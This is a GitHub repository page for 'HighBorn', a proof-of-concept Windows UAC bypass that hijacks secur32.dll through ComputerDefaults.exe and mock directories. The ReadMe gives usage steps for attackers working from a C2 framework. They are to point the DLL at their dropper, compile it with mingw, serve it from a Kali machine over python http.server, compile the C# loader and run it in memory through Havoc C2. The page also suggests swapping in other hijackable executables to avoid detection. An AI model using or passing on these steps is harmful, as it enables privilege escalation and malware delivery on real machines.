assume-breach
8c33f4623b
Add files via upload
|
3 jaren geleden | |
|---|---|---|
| .. | ||
| packages | 3 jaren geleden | |
| HighBorn.c | 3 jaren geleden | |
| HighBorn.cs | 3 jaren geleden | |
| HighBorn.sln | 3 jaren geleden | |
| ReadMe.md | 3 jaren geleden | |
ReadMe.md
Windows UAC Bypass utilizing mock directories and DLL Hijacking. This is a tool that I created to use with the "dotnet inline-execution" command on Havoc C2, but it can be used with any C2 that has in-memory execution. This was just a quick and dirty POC.
Usage:
Open the highborn.c file in a text editor on your Kali box.
Replace the file path with the file path of the executable that you want to open (ie your dropper).
Compile HighBorn.c into a dll.
linux command: "x86_64-w64-mingw32-gcc -shared -o secur32.dll HighBorn.c -lcomctl32 -Wl,--subsystem,windows"
Host the dll on your Kali box.
command: python3 -m http.server PORT
Compile on Kali
apt install mono-complete -y mcs -out:HighBorn.exe Highborn.cs
Execute on C2
command: dotnet inline-execute HighBorn.exe
Replace the ComputerDefaults.exe and secur32.dll with other EXEs and DLLs as you find DLLs that can be hijacked. ComputerDefaults is a popular one so it is probably monitored pretty closely.